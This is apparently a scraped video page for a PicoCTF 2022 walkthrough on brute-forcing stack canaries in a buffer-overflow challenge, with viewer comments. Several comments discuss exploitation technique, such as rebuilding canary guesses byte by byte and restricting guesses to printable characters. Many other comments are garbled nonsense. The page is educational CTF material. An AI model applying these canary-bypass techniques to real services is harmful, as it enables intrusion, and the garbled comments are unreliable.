PWN - Bruteforcing Stack Canaries (PicoCTF 2022 #44 'buffer-overflow3')
Рет қаралды 25,213
2 жыл бұрын(PS, jump into the HackTheBox Cyber Apocalypse CTF! j-h.io/htb-cyber-apocalypse2022)
Help the channel grow with a Like, Comment, & Subscribe!
❤️ Support ➡ j-h.io/patreon ↔ j-h.io/paypal ↔ j-h.io/buymeacoffee
Check out the affiliates below for more free or discounted learning!
🖥️ Zero-Point Security ➡ Certified Red Team Operator j-h.io/crto
💻Zero-Point Security ➡ C2 Development with C# j-h.io/c2dev
👨🏻💻7aSecurity ➡ Hacking Courses & Pentesting j-h.io/7asecurity
📗Humble Bundle ➡ j-h.io/humblebundle
🐶Snyk ➡ j-h.io/snyk
🌎Follow me! ➡ j-h.io/discord ↔ j-h.io/twitter ↔ j-h.io/linkedin ↔ j-h.io/instagram ↔ j-h.io/tiktok
📧Contact me! (I may be very slow to respond or completely unable to)
🤝Sponsorship Inquiries ➡ j-h.io/sponsorship
🚩 CTF Hosting Requests ➡ j-h.io/ctf
🎤 Speaking Requests ➡ j-h.io/speaking
💥 Malware Submission ➡ j-h.io/malware
❓ Everything Else ➡ j-h.io/etc
@MrToast72 2 жыл бұрын
I've been watching all of your CTF videos for 2022 and dude, you do a fantastic job at explaining everything, even when your dead tired at 1 in the morning you still take time to explain everything in detail. Thank you for making me fall in love with pen testing and cyber security even more than I already am! You go John! PS I did the KZfaq things 😉
@kevinwilson7213 Жыл бұрын
Dude! Please do more of these. It is way more helpful to see you "bump around" (and thereby realize that you are human) than to just see you figure out complex problems in a millisecond and feel like a complete dummy when it takes me hours to figure out the same thing (if I ever do!). PLUS, we get to see your "debugging" process, which is super, super helpful. Thanks for the content as always.
@CrazedMachine Жыл бұрын
I appreciate watching the full process of figuring it out. A lot of videos just speed through things and I’m left thinking “how did you see that so quickly?” Watching you do your thing as is also teaches the problem solving process which is just as important.
@logiciananimal 2 жыл бұрын
Great stuff! I'm finally getting to piece together what pwntools does. (I understand buffer overruns etc. fairly well, but these automated tools are new to me). What would be even better would be some sort of O'Reilly book or the like on it. (Yes, I'd even buy a dead tree edition.)
@edi33416 2 жыл бұрын
You can access the man pages of read with `man 2 read`. This is because read is a syscall, not a library function, so it's docs are in section 2 of the manual. Section 3 is for libraries. Hope ppl will find it helpful. Keep up the great work!
@marcovalentinoalvarado3290 2 жыл бұрын
Interesting, thank you for sharing :)
@edi33416 2 жыл бұрын
@@marcovalentinoalvarado3290 You're very welcome. If you want to find out more about the other sections of the manual, inspect the manual page of the manual itself (I know, Inception much?) with `man man`
@moistgiraffe3574 Жыл бұрын
This is was a niche, BUT EXTREMELY helpful comment. I've been wondering for ages
@yurilsaps 2 жыл бұрын
Great!!! Please never stop!!!!
@0root1 Жыл бұрын
18:40 that offset variable was haunting me since the last two videos. Great video.
@SalmanKhan.78692 2 жыл бұрын
Great content Thanks sir for providing this type of knowledge 🔥🔥🔥
@LDowning0190 2 жыл бұрын
Great content as always. Thank you for sharing. I am learning a lot about python.
@WhyCantIFindAname657 2 жыл бұрын
Great video, really learned a lot👍
@sudoer92 2 жыл бұрын
You are the best dude Keep up 🔥🔥🔥
@jacobfinder7476 2 жыл бұрын
John is a Genius!!!!
@sgtreckless5183 2 жыл бұрын
Ah, now we're getting into the interesting stuff!
@tpai302 2 жыл бұрын
And of course it’s another “banger” video.
@verolyn8459 2 жыл бұрын
First, t'looks like gonna learn something new again..
@charlesnathansmith 11 ай бұрын
Just a programming note: byte arrays are mutable, so you don't need to completely rebuild the payload every loop. You can just build it once with 4 random bytes for the canary, then when solving for the first byte just modify the payload[offset] byte and send off payload[:offset+1], then once that's found, loop through values for payload[offset+1] and send off payload[:offset+2], etc It's more efficient, and you don't have to keep up with the values of the positions you've found so far because they're already saved correctly in the payload
@tbremard Жыл бұрын
Hello my friend, at startup of video you are struggling with sscanf, it seems to me that you do didn t spotted the 2 's' : sscanf is different than scanf. first parameter of sscanf is a pointer to a buffer which is called length in this instance, thats why your printf %d returns random number , and should be replaced by %p in order to be compliant with the type which is a pointer thanks for all the rest
@bhagyalakshmi1053 Жыл бұрын
Concrete wall for you breaking information
@adamsiek6438 2 жыл бұрын
Happy KZfaq Comment~!
@bhagyalakshmi1053 Жыл бұрын
Rdi ,RSI,rdx buf function using number
@bech2342 2 жыл бұрын
next time try socat for the binary as local service listen over tcp.
@ArSiddharth 2 жыл бұрын
Hey!
@bhagyalakshmi1053 Жыл бұрын
Relying
@yajusgakhar6969 2 жыл бұрын
Should we attempt buffer overflow challenges without checking the source code?
@bhagyalakshmi1053 11 ай бұрын
Library here
@ugurre Жыл бұрын
Can we somehow exploit the fact that the local stack canary is copied from a global variable instead of brute forcing (e.g. if the canary was less "brute-forceable")?
@depon91 2 жыл бұрын
Can you please have a go on device called deeper connection Pico DPN (like VPN) and they are claiming that nobody can hack it . Since you are very creative i was wondering if u wanna have a go ? Thanks you’re great 👍
@bhagyalakshmi1053 Жыл бұрын
Value hai
@bhagyalakshmi1053 11 ай бұрын
Rax,rex,rdx, 0x86?
@bhagyalakshmi1053 Жыл бұрын
Sal , change?
@bhagyalakshmi1053 11 ай бұрын
Malloc ?
@bhagyalakshmi1053 Жыл бұрын
Canry 1,2vlun explain.
@Lukemagic01 Жыл бұрын
My solution appears to work locally, but once I connect to the remote server the 'leaking canary values' are returned in hex ('\x03\x01\x01\x01') and I get a UnicodeDecodeError: "utf-8 codec can't decode byte 0x93 in position 25: invalid start byte" Any ideas why this is happening and how to resolve. I've googled my brains out but can't figure it out.
@exosfear512 Жыл бұрын
I think due to the remote system being slightly different, \x03 is a bad char which will kick off the false 'Flag?', since this is a custom canary we can safely assume the four bytes of canary are printable characters because it comes out of canary.txt. Instead of iterating bytes 1-255, 'from strings import printable' and then run 'for i in printable'
@ugurre Жыл бұрын
@@exosfear512 I agree that's probably the case given PicoCTF is very cooperative with that sort of thing. But in reality that could be a big "gotcha!" because you could really name any kind of file anything (e.g. canary.txt could easily be a binary file).
@bhagyalakshmi1053 Жыл бұрын
Rflag?
@bhagyalakshmi1053 Жыл бұрын
Banck employees sylres nover coming.
@CashtynSomethingCool Жыл бұрын
Heyo
@prasadsawool6670 2 жыл бұрын
Yt algo bump
@bhagyalakshmi1053 Жыл бұрын
Today is my eyes chemical to facing problem nover problem chemical to face 👀 not problem
@unutilisateurdeyoutube1256 Жыл бұрын
Damn my script works locally but somehow it doesn't work remotely. Could you please provide your source code to test? Thanks! :)))))
@FunkadelicFeed Жыл бұрын
Same for me it's spitting out hex when bruteforcing canary and that too incorrect hex values. For me the canary is coming \x03\x01\x01\x01
@unutilisateurdeyoutube1256 Жыл бұрын
@@FunkadelicFeed lol me too :D
@unutilisateurdeyoutube1256 Жыл бұрын
@@FunkadelicFeed Have you figured it out why? Found a way to solve it tho.
@FunkadelicFeed Жыл бұрын
@@unutilisateurdeyoutube1256 naah I haven't been able to. What solution did you figure out?
@bhagyalakshmi1053 Жыл бұрын
Conr vlu?
@bhagyalakshmi1053 Жыл бұрын
Desc,asc date rood ing number attending time........
@AntonioSouza 2 жыл бұрын
@_JohnHammond you are amazing. I love your way and I have learned a lot from you. Thank you very much.
@bhagyalakshmi1053 Жыл бұрын
Volume button purposes hi volume Exl,rop reply
@bhagyalakshmi1053 Жыл бұрын
Jump number cinr
@bhagyalakshmi1053 11 ай бұрын
Canary vuln report new video creation 🤦🤖
@bhagyalakshmi1053 Жыл бұрын
Dive to ip address number dive files open remo light attending after again to everyone that red colour process signal to dry flowers
@bhagyalakshmi1053 Жыл бұрын
Ato z
@bhagyalakshmi1053 Жыл бұрын
Search ? number name
@bhagyalakshmi1053 Жыл бұрын
Canr vilu number meine in
@bhagyalakshmi1053 Жыл бұрын
DemJ vlyuu
@msasdc2087 2 жыл бұрын
Disgusting
@bhagyalakshmi1053 Жыл бұрын
Volume button purposes hi volume Exl,rop reply
@bhagyalakshmi1053 Жыл бұрын
DemJ vlyuu
@bhagyalakshmi1053 Жыл бұрын
DemJ vlyuu
@bhagyalakshmi1053 Жыл бұрын
DemJ vlyuu
John Hammond
Рет қаралды 43 М.